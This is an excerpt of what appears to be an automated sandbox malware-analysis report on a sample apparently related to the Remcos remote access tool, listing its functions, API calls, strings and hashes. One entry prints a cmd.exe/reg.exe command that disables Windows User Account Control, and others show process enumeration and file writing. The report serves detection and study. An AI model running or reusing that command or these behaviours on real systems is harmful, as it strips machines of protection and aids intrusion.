CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

0, xrefs: 0041D52B
MsgWindowClass, xrefs: 0041D526

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
C:\Windows\System32\cmd.exe, xrefs: 00407796

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

Rmc-0ZPVF8, xrefs: 004076DA
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 004076C4

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\ltlbVjClX9.exe$Rmc-0ZPVF8
API String ID: 0-401469549
Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
SetEvent.KERNEL32(?), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
Sleep.KERNEL32(00002710), ref: 0041AE07
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10

Strings

Alarm triggered, xrefs: 0041ADC9

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB

Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Function 02171601 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction ID: 0415aec15d9e06341fb99b2d362b00fe7ec861a5eee58153291cf8eefb9db89f
Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction Fuzzy Hash: 8571A431D81256AFCF219F55C884ABFBB7AFF85324F284239E41967280D770D981CBA0

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Function 02174F62 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0217639E: RtlAllocateHeap.NTDLL(00000000,02165523,?), ref: 021763D0

_free.LIBCMT ref: 0217506D
_free.LIBCMT ref: 02175084
_free.LIBCMT ref: 021750A3
_free.LIBCMT ref: 021750BE
_free.LIBCMT ref: 021750D5

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction ID: 996d9356f52d63b4eff4036ea39ef2931b5c67e4f9b13c0842b5e94906a27e09
Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction Fuzzy Hash: 7B51AF72A80704AFDB24DF69D841B6AB7F6EF88725B54056DE809D7290E731EA41CF80

Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446137: RtlAllocateHeap.KERNEL32(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

_free.LIBCMT ref: 00444E06
_free.LIBCMT ref: 00444E1D
_free.LIBCMT ref: 00444E3C
_free.LIBCMT ref: 00444E57
_free.LIBCMT ref: 00444E6E

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88

Function 021795CC Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 02179636
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 021796AE
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 021796DB
_free.LIBCMT ref: 02179624

Part of subcall function 021769E9: HeapFree.KERNEL32(00000000,00000000,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?), ref: 021769FF
Part of subcall function 021769E9: GetLastError.KERNEL32(?,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?,?), ref: 02176A11

_free.LIBCMT ref: 021797F0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: 98f97ec1506950012b0b3001a4c97b3459cc734b8faa1866ed59b90e0ad8ba3a
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 98512871840249EFCB14EF69DD809AEB7BDEFC5320F1006AAE424A7190E7709E49CF90

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

Function 0213FB64 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0214C21E: GetCurrentProcess.KERNEL32(00000003,?,?,0214B538,00000000,004750E4,00000003,0046739C,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0214C22F
Part of subcall function 0214C21E: IsWow64Process.KERNEL32(00000000,?,?,0214B538,00000000,004750E4,00000003,0046739C,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0214C236

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0213FB82
Process32FirstW.KERNEL32(00000000,?), ref: 0213FBA6
Process32NextW.KERNEL32(00000000,0000022C), ref: 0213FBB5
CloseHandle.KERNEL32(00000000), ref: 0213FD6C

Part of subcall function 0214C24C: OpenProcess.KERNEL32(00000400,00000000), ref: 0214C261
Part of subcall function 0214C24C: IsWow64Process.KERNEL32(00000000,?), ref: 0214C26C

Part of subcall function 0214C444: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0214C45C
Part of subcall function 0214C444: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0214C46F

Process32NextW.KERNEL32(00000000,0000022C), ref: 0213FD5D

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: e6456f02d5d18d61e9a12733028e8d68b1b409d8be02be40c90b48580702cd70
Instruction ID: d96e3ace205f68df0e4b0fa88e26ae25a961bbba85579c6861dc04851659f367
Opcode Fuzzy Hash: e6456f02d5d18d61e9a12733028e8d68b1b409d8be02be40c90b48580702cd70
Instruction Fuzzy Hash: 9441F0315882849FC326FB24DD50AEFB7ABBF94344F50492DE54E82194EF70AE09CE56

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: 7df3497689f69636df7e050876ed87061d27f8334b78801a09f718fc4a49dc38
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 7df3497689f69636df7e050876ed87061d27f8334b78801a09f718fc4a49dc38
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Function 02174060 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 021740D2
_free.LIBCMT ref: 021740F2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: c9275f46d05a4c687741755a09654fb0495d1bb4c07e93afd8a18958d6e00b82
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 42419136A402149FCB24EF78C880AAEB7B6EF89714B1545A9D555EB351DB31E901CB80

Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443E6B
_free.LIBCMT ref: 00443E8B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84

Function 0217F5C1 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0217F5CA
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0217F5ED

Part of subcall function 0217639E: RtlAllocateHeap.NTDLL(00000000,02165523,?), ref: 021763D0

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0217F613
_free.LIBCMT ref: 0217F626
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0217F635

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction ID: f48a8b2ef83c7d388196d11b893c37d3e21b4fd2ed2cd66d1ed187a151cd0f28
Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction Fuzzy Hash: 4D01DF7A649715BF27211ABA6C8CC7F6A7EDECAAA97050139FC04C2150EF60CC0385F0

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.KERNEL32(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Function 0214C658 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0214C777,00000000,00000000,?), ref: 0214C697
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0214C777,00000000,00000000,?,?,0213AB4E), ref: 0214C6B4
CloseHandle.KERNEL32(00000000,?,00000000,0214C777,00000000,00000000,?,?,0213AB4E), ref: 0214C6C0
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0214C777,00000000,00000000,?,?,0213AB4E), ref: 0214C6D1
CloseHandle.KERNEL32(00000000,?,00000000,0214C777,00000000,00000000,?,?,0213AB4E), ref: 0214C6DE

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 91ead3acf6a94f55f06cb48fe527b9b4ce48c1e45e8ce3e074f7ba6ba5b4ac6d
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: 73110871287214FFEA144A349C48E7B779CEB4A225F01962BF565C22D1CB21CC0086F8

Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

